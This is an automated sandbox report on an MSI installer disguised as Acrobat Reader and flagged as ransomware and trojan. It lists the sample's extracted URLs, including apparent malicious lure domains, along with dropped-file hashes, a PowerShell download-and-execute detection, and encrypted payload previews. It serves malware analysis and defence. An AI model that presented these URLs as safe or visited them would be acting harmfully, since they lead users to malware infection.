https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.br	0%	Avira URL Cloud	safe
https://bost.blob.core.wi	0%	Avira URL Cloud	safe
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf	0%	Avira URL Cloud	safe
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf	0%	Avira URL Cloud	safe
http://www.schneier.com/paper-twofish-paper.pdf	0%	Avira URL Cloud	safe
https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.brFMX_STYLE	0%	Avira URL Cloud	safe
https://bost.blo	0%	Avira URL Cloud	safe
http://www.ietf.org/rfc/rfc3447.txt	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://www.apachefriends.org/f/viewforum.php?f=16	0%	Avira URL Cloud	safe
http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf	0%	Avira URL Cloud	safe
http://crl.microQ	0%	Avira URL Cloud	safe
http://www.schneier.com/paper-blowfish-fse.html	0%	Avira URL Cloud	safe
http://www.itl.nist.gov/fipspubs/fip180-1.htm	0%	Avira URL Cloud	safe
http://tools.ietf.org/html/rfc4648	0%	Avira URL Cloud	safe
http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf	0%	Avira URL Cloud	safe
http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf	0%	Avira URL Cloud	safe
https://bost.blo(f	0%	Avira URL Cloud	safe
http://www.borland.com/namespaces/Types03	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/soap/encoding/03	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crashpad.chromium.org/	WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000009.00000000.2061595070.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp	false	URL Reputation: safe	unknown
https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.br	WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CFB000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9DBF000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2070683951.000000006626A000.00000002.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://www.apachefriends.org/f/viewforum.php?f=4	xmpp.dll.1.dr	false	Avira URL Cloud: safe	unknown
https://bost.blob.core.wi	Br_i421i2-2481-125_754864.msi	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.2007551719.0000000004706000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	WebExperienceHostApp.exe, 00000008.00000002.2062560294.0000000065F52000.00000020.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	false	URL Reputation: safe	unknown
https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.brFMX_STYLE	WebExperienceHostApp.exe, 00000008.00000002.2070683951.000000006626A000.00000002.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.2007551719.0000000004706000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000003.00000002.2007551719.0000000004DDF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crashpad.chromium.org/bug/new	WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000009.00000000.2061595070.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp	false	URL Reputation: safe	unknown
http://www.movable-type.co.uk/scripts/xxtea.pdf	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://tools.ietf.org/html/rfc1321	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal	WebExperienceHostApp.exe, 00000008.00000002.2070683951.000000006626A000.00000002.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	WebExperienceHostApp.exe, 00000008.00000002.2062560294.0000000065F52000.00000020.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	false	URL Reputation: safe	unknown
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.schneier.com/paper-twofish-paper.pdf	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bost.blo	powershell.exe, 00000003.00000002.2007551719.000000000490E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ietf.org/rfc/rfc3447.txt	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000009.00000000.2061595070.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp	false	URL Reputation: safe	unknown
http://www.schneier.com/paper-blowfish-fse.html	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.2007551719.0000000004706000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.itl.nist.gov/fipspubs/fip180-1.htm	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microQ	powershell.exe, 00000003.00000002.2011514359.0000000006B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apachefriends.org/f/viewforum.php?f=16	xmpp.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.borland.com/namespaces/Types	WebExperienceHostApp.exe, 00000008.00000002.2062560294.0000000065F52000.00000020.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.2007551719.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tools.ietf.org/html/rfc4648	chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://bost.blo(f	powershell.exe, 00000003.00000002.2007551719.000000000490E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.borland.com/namespaces/Types03	WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9DE3000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2007551719.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/03	WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9DE3000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447349
Start date and time:	2024-05-24 20:58:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Br_i421i2-2481-125_754864.msi
Detection:	MAL
Classification:	mal80.rans.troj.evad.winMSI@12/188@0/0
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 29 Number of non-executed functions: 206
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.150.111.4, 52.182.143.212, 20.42.73.29
Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, bost.blob.core.windows.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, blob.cpq22prdstr01a.store.core.windows.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target chrome.exe, PID 2500 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7712 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Br_i421i2-2481-125_754864.msi

Simulations

Behavior and APIs

Time	Type	Description
14:59:20	API Interceptor	45x Sleep call for process: powershell.exe modified
15:00:20	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50	181_960.msi	Get hash	malicious	Unknown	Browse
	232_786.msi	Get hash	malicious	Unknown	Browse
	zHsIxYcmJV.msi	Get hash	malicious	Unknown	Browse
	18847_9.msi	Get hash	malicious	Unknown	Browse
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14	181_960.msi	Get hash	malicious	Unknown	Browse
	232_786.msi	Get hash	malicious	Unknown	Browse
	zHsIxYcmJV.msi	Get hash	malicious	Unknown	Browse
	18847_9.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\4b3b29.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	671488
Entropy (8bit):	6.594475952645236
Encrypted:	false
SSDEEP:	12288:0urEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKgj:bihNREtRdYndJP32R7vKG+47/L025zEH
MD5:	3550DDF03B967F3B3E34A38EE441CEB2
SHA1:	CBF8384538628055171E956F9FD1BD25DBE351B8
SHA-256:	C807A09D897A9B844A2D079864C71340D682BB61E266BDE438DF393F6E34DEC5
SHA-512:	4DE3526442C828F58E71E56C53AB6D0C2A35848A15887F45EA40CF7E8BBD47C845A87AAC61C60F2164781E1B05B8471FA493CB83780E0129E2ABAF6B6CFA881E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Config.Msi\4b3b29.rbs, Author: Joe Security
Reputation:	low
Preview:	...@IXOS.@.....@jw.X.@.....@.....@.....@.....@.....@......&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}..Acrobat Reader..Br_i421i2-2481-125_754864.msi.@.....@.....@.....@........&.{2DB5220B-06B7-4340-8D25-6BB9D51802F1}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{D608D6C6-E1D1-48EF-AE39-6038652DD840}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{0D0E7F8C-B4C8-4986-A673-327EDC71EEC4}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{91BA76A9-0280-497F-BFC0-A4C75CDB0602}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{FA03198F-B392-4134-AD20-DF29AC352441}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{85D0863B-98F4-44AF-B4EC-437936C5BFEC}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{586E7C74-1927-41D4-9C6B-A2903F408CC9}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{93F35

C:\ProgramData\Chrome\Application\118.0.5993.120\124.0.6367.119.manifest

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.950479865350114
Encrypted:	false
SSDEEP:	6:KdhlRu9TbX+A8/5RFYpqaHkbdaHX0CdiYCMfrA1G:KLuVA5cpqnbd007v9G
MD5:	3D1A60355169072CAFDD73CFF131E17E
SHA1:	251C2DFB1CD400984DBC27C24BABE23EADB53CD2
SHA-256:	7A2C335DCB1154297442EA04FDA76C6EC8BC4436A4221E47A6C814B8A35E1FA3
SHA-512:	81D9E75F2766B3E9D15AB12313D06C42D79812C82FD587CD5A0ABB04F7C03AD549810A50F3410514A3E78D99247E5BDD5C0524541C5230672C5A9308318F078C
Malicious:	false
Reputation:	low
Preview:	<assembly.. xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>.. <assemblyIdentity.. name='124.0.6367.119'.. version='124.0.6367.119'.. type='win32'/>.. <file name='chrome_elf.dll'/>..</assembly>..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.1

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	103991
Entropy (8bit):	7.998327541415064
Encrypted:	true
SSDEEP:	1536:P5DGAhZ+Fj+rvsO8dPUKkCohq5eJomYJiXw10rFhoMKyTJYGEG+XnyR:PNGAba1DcKo0eJXASxaMnFN+XyR
MD5:	CAA89004DB99A2ADBB5AF8C708A83D24
SHA1:	0553BAE827AF709CA174A90C3380C998BF3E4971
SHA-256:	FE967E1B16FE2B3635A789DC39DA30BF25F4695F114BCFA9EDA630828F5823BB
SHA-512:	BD2BA2BDD969C61DC4C9BA4EF1716FCBC4F9356B12C5A69D3E4F1257C7BC4A12DFE11B8B385982B9A18011CD492F5B5C0D74CB6A30128958C8D938AD3384AD83
Malicious:	true
Reputation:	low
Preview:	..x..&.aN-Q...3ht.p8...:........+Pu.Nqt.Ip.%.f?.(2k\.)....H.I.Z...?.I......f>......,..h.....V...^.:._i.v..Vz...,.\|.m.q..t..?.D6..N7.U...=..J...1...n.....0.u1+@..+.x{..\|.I..~y&_.....l<L.}....Gj..........s....}o...../Y?..VV.Z.a.........~.4.......)....OA..lHm^F.^..".=.s._. S.n.w6.c./.n.h..N.D...0^.~....,}n..h.....rK.H.d:...D.JJ\|$...>....s...h.........zS.-]@I..}.Y]..8.P..`.G\Z.............O'gnW....1.p5...6.....#.E.....U.P.%)./.m.......i{.+...6.d3...+!.k:'..".@...&........Tl..yA..Z.q..#......D".."h..J.M.)B.._Z....G..z.:`.3...Ta...Q.q=N..H..D.V.....f..<c..f.(.[.#.;..v...?.Z/.j...w..+.....}nu..e.u....."kK_\.........\|.6.....?.q...h......uG.C..k.?Oi..8,<i..D..\|=...,.....(......@......H...v.........<..l../t.....6...&yT..r.u..`....}......a....ur.7.H5_.(...+X ..#.....0.(\_..S.....5.\b.....qu+5........S8c....O......Jq.....+q&17..C..#...i. tIe.......;.cfU.3V.....~...9.!..4{.3....cE...;....RK...I.j..c<A.WN~....C.H.aL.....vVLm......(.q!

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.10

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	97519
Entropy (8bit):	7.998059770467659
Encrypted:	true
SSDEEP:	1536:s41vCdu9NXtS/dA4KDeefltb6ZDTgYMlqnysqe4PbbhIbtmHl8E5VjIsYsa:sYvC4NdGKDeeffZqnyXe4zb6oHugtJYr
MD5:	5D6EE938181D82EE2D9CDE7F7B732E75
SHA1:	FA884FBE87503B86C5DA66AC73EC1381DC900F27
SHA-256:	F88FC25525E1180B73C9B37CAE20A9B4FF32987BF614FB3B1DA29DCC31BDFC10
SHA-512:	1AA228880A7F9915E08BBF9929DD5FB5F7E185351BD23FC49FD977A0102F21F6E99404264DAEB19AAE03D6FE41C4C11A496C3E3FF350388F61C1ABB47AA979AC
Malicious:	true
Reputation:	low
Preview:	.N:"vMS2.F.]...8O..6D..M...egv..'.@.._...Cu....kc]6)%I...]s.O...1K..5...b.......m.u...^.aPCD.......vSS.0hM..5...Uv!.....x.....:l.f.....d.Un...F...^.g.....2.[....V.b.......K..r...f..W.F......$..}........z.V.1.=..I.2+.6.............%...b.Tq..J.....:.....v..(&,.\|.gnv&.WH.)..[......F.....)?.0^....G.w...Z(...MZ.E......N.q.I...n..H...IE.sl..c..l..[...E.M%Z^.._N...F....)Pj...m....O..-.."..7f..=...oq.x.d..re...hlQ.C.\"...P=...~.g.!.o\|...p.F..C..Nks..\|C'#.~Ad.L.r.n.u..(....B.FB1..1.U2..1..hn../.D...E.?..u.........`l.J[.Pct].....ml.anJ...1v\|..[.......sq..4...Z!.$4WW...R..f....:w.[sK..bQ..jI.+.N.aO...a..z.N...L.5.~..E/c...L~...$.me..k...D..LU..>I!.9..r.~.......<......I$C. V(..#(]....]6...i........N.d..x......q.8r?.(.R.7.#.0G.....~X........;...;....ghr.)....t.vuye~.M.....,.[Q..V.P.G.K!.e.=..z..8AY.....!9[.............1...].b..V.G......w.7....;.X..l.H...YQ....PH%}.$..$..J+...IG...8............C..d...K..=....u.kL.(..k...U..#...e,....4i&.>...Az.gh..&...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.100

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	104708
Entropy (8bit):	7.998144550191305
Encrypted:	true
SSDEEP:	1536:kw6o34Q10auP010rl/MMZIHw+6tQP/7s3EgJ33eP6iuoH01FOn7acb0kvXbJ:D46d2rlUMZIHGWP/7s3tuP6iE7u0kvLJ
MD5:	5567BFFAE9E3519CEFEDF97092A374F8
SHA1:	C03147DC3CB25A2A0381CD4F934E4289347BE317
SHA-256:	DCE1C47108988E44E9EAC44437FCA9B6CA80BB833604B89759F3244A392CEC42
SHA-512:	0176DEA07103AB310355C8EBF5D3CAF25839EEBCB7DEC273405D3ABBA516679BEE0D0DE308F82E4C486A2E76DDBF65176A57B0C6E8F6DEB6491BE3BFB85AC14B
Malicious:	true
Preview:	6U#....9..Y...w....g}..f....,..$..F...!..x..b..j.L...A....E.a&..N...7..bJ...l.l......`=.....!.`...9.)#.[.g...@....0.D\|o.Q\|)._y..C..l..B....i....?..M:..0....1..m8Y.h.....'..........h.v+.b~s.Dg.MM,..I......3...4...L3...1\|.....u.!..P..~k..hh1....6.>X.R.b..@9.....)4C.....T.....b.....M..D+......a.G...S]Cbt.6.G..'..1......~..x.\.n....E.E...na%.V....n.....B.u.h..H..;z.3.#..4..W.....3\|dr..U.z.9.&.o.....B..#X...^...._.&K..H...}y...._...`..!!.ne.bI&..x.....y..m...^..Y.3..2ul.......AN..K...v..o....X...w5".21,1..uw...9.V..< 9... -..=.c....;..GQ....w.$r..$...Y.ZK0..S..."._.'...\V...;N....M......x..8.1D+.4..t.c._..5sX......mR.g.$0.w..G.....]..o..xD..vp,..qg..'....In..n...0DB....7.h...,......@.....;.7<...[vO"B.5A3..H.Qo.d..&.s...S.v....jJ.#Sa.S5.K....LT^t..^Cc".cX.?%.*..^.....aP...eG.....yf..bb......WvJ.{...S6D...R..X._....Q..0cja...._......(k.6Fa>_>.t.-H.S..._....<.?.#..O..D.H6.98.....s..T........7..j.../..g....B,'..VE.7.l..b%.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.101

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	87789
Entropy (8bit):	7.99805920411028
Encrypted:	true
SSDEEP:	1536:anji+x+n09Z1mNOTg80ELTAqomeO8Y5XVaN1koUXWE/HS6u8/VvhI3jAWf+0mIzw:aji+LyuTAq7eNN1k9bSZyvhITJm09M0i
MD5:	944AB53D06E45EB2E1E8C2B2C6B00CFE
SHA1:	510B7982AE21DD5C4CDB79EDA4EC1EC54C26EAB6
SHA-256:	5C6FD879514A3C0C97F5C6F384482EE4D3150C3BED402609919CD8D8732ECA21
SHA-512:	AB0AE37163C334A6A83E1F41467DC5F21C067C33ACFDD0E864BCC6020D83BE5C00BDA38D1C6799FEDFE6C80F717930FB19049BE5F9BFFE34D3D91BDC4BCD423D
Malicious:	true
Preview:	...oy...L.0 .....f...[.8a.qT.6nG....Z....J.[k...H.7@Jht.Ds..i.....P.iU...].]..Z.?...bi#.~=.I...~.&.aSY...>.9z....ir-VgUW0[V..<:.E...(g.9<).B.5...+i........5]k......&...T.5.OD."..c.=.j_$......[:...]....:O...;....m......a..<.\|>.[.Yk......Zz.@.[D.I>...?.._v:.......k.a....+..O"..o.0....j......k...<3......l.S?......<......j{bPD..o..W.y....4n,J87....<....,.;.\|.c.@.\|....!.f....CT...9}k.P.jf..;$....X.,$q\|8.a...r.i.-...FQU.#{.1.,a....SwU.@.O..a....<...=cz.A.....~..d.0O.x.....yQ/...q...M.Q. ..ee...!..a{l..[.)....-K.-+.J.C.6...Q...a6.9M...N/1..tA..O..1.$..ZqB....A....N...J....s..`..<..VT;w)K}r...f..}......;S.Zf`...gK.r#S?.>..X..S...\...[s:...o..(...V.>f'f.:l.,e&U?..m.3d.....jT\|.j...T..S.(.ZI..16.c(.........(.)I".~.........;.._..#....T:..$.'j....4...`-....5....i.'.%...,..4.*..t..:.\.c.1....a....#..<..K.......w&.f.....D.yA..Y."3.f@4.Z.8OK4....5...X..1!Z..xD.D.v!h...{H.o..J...4....]...i.?..?......C.......x.....)g.p4X<..&S`...f\|.G.....\..~..:

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.102

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32184
Entropy (8bit):	7.993984375372734
Encrypted:	true
SSDEEP:	768:FTuiWqjj/ndxrW8vBLtxMC32sFqz6LtYhATViwRP:Z5N/nvS8v/xMCDFostfV3P
MD5:	0DBF722D1FA4C22E4B10C69CF9AA7813
SHA1:	DEA4661D11603DB0F5FA7605E937B2065C1E60C0
SHA-256:	F5AF4E2B5911EA08B406E3EA44BA099B1A1E035C963C4260ACADA6D8A6AC8F81
SHA-512:	B5FB16D56716B2D228093AD7FAE80C85748236EF413078815D4615EFF1E249B217CFCC5728690EBF2967F98373EF652053230579D31D2FE422BE5B49F327C798
Malicious:	true
Preview:	T.}..-oOR....f.N.F....B..5...'..I.R.c....B._\|Pb}>..w:.w..w.;.......&..@....)..8# .b....#L. ';6..m._."/}..p.....mRsZ.;1.x$U.:........o%HXC......9....H.r..S.kXf!u~.{/.."pKV).8...2.FC%.r...........W."qA....I....h.o......./..j.~.Jw7K`..5S\By..N...eW+.'j...".?.)P.`.[.....m..Q....55J!.h\|3\........E.]..p.M.....[..r..i.`......d.I...:.....>Mn.Df'...Q.D..%.'..@m.x.^.x.....6.r...Fkh\|.v...a.......Y.?I.MI..;`m]Ucl.........Z.N...O.>A9...4F....W..?.?...6.=.@#z.;7..a.}.T .8...(v".r..].[".W.W\|.u..../...e......d.U&.$2.9.O..c.\P...3......Y.......h.......=...x....H#.a.)....y..>.\|,FB..Ap.$/d+.....`j2.1t......{.....^.&..@.L%..k9..9.e......q.^R...x.k..<.0....1....;Rr.Y.+MpI.....`.q.=.<.-.P..m2..n6.......WMF3...G.}:...xHZ.....-.{.Is...n.7A.......X....m.$;.....kI.rm0....q.;.6.Z..{..k_.c....MK..J..1.G..:..I.p..mZ...j....8..t]........5{..J.ME..=....E+..S.+.`,F.....)..'W.."#iT>..CcZ.[.~..C:..v7..x.........lI.jS....C......... ..e.(..4.:.8@ha...S....tA.8..A.D.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.103

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	57860
Entropy (8bit):	7.996961383097085
Encrypted:	true
SSDEEP:	1536:4onB7ezCgX0whRqKNY2Hv1R4eETDPlLLVI/FFVUmmCM:/BizCgEwhRqzNtLLVwbFrM
MD5:	5E494E15A0AA584319E0FCA3204F2E67
SHA1:	D4A8E02A765EE181E5980950223A7A3ADA8B7017
SHA-256:	17A6F1C5E2B5D1681188F42641AE8C55E520D1E9710995462D0B0A52289D4D74
SHA-512:	B9D7C9AF05F3C94C954A011B1CCB8709CAA218A271CAA56D025CB5369DDCB6403B33330BB9D2B79973110E6AFAFD27469B5DBA36ED18F4701344598FF0D9AC60
Malicious:	true
Preview:	.).d.S....;..D...S..@. .....&>RH.$.u.]2.4.5..]..........R\L..i.Q.F..I..(....p........ .oiu..Y7..rwg.Z....SS.a.=#.e.@.7R..l,.8..6.9.......C.iRu...Z.\|...r,3l............j.L\Cn..........t.V5{.wW.K..Z._}\..8I..7....Ku......../.`...-wH...o{:..H@.....`.+S3..6..jH...Ik.!..N2.._..\...9...m\|..^..5.:R.5....^.......rI..m..K.<%..\..<;Wj...R.C.Od.[b...S5...f.$...f\<...7p..1g."...B.3..w.:.....-C...q..r..G5".I.S...EH.W..._F.ZC.~.......v..~A\|NWxx\l....\|..; h>.41X.f...-y..;e....A[.].w^].....oy0....\|..=."..S.'Jj..........7T}....N._....-....j.]....z.w.......b;a.+R..P...].p;..K$....a.g_r..4.[r..`.2j.\|........&3..e.k.j.B.......?+..7T.Q......7..ye<..9..$;.h....]........oT.e?.A.."{......l.]..Z...xt..W\|.B.....f,}P..&...)z.,eb..Q..J....1...fa...0........3iL.kA...w.........:..h.H.dKF.2.o........:uv../.,............,p.#k..X........er.j4.7.....mY.{...x2.\5].:K..A=..d0..4..(7.......gx).f...-.x.w,M.H."!.Q..c.u..NIV&O....(.W.B./.....Np.........W,A3.x....@...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.104

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98056
Entropy (8bit):	7.998371655290425
Encrypted:	true
SSDEEP:	1536:7Z6vVvq0fFRvHymqh2GB0pqeCAz2GRkOgfKZ/sNZAJMKSSNlC1kW5iqKWNV2EuAT:8vtqqFRjqQGB4qz/kk/KZ66SMKkq/nhp
MD5:	976772315D7C186F84C04FCEAE791102
SHA1:	EA82D9DCF5A3C349C04B2B6339F68359369434E6
SHA-256:	DE8F33830B565C5E3CB7ABB7F18C03500445435571CC3C1C225762005247E111
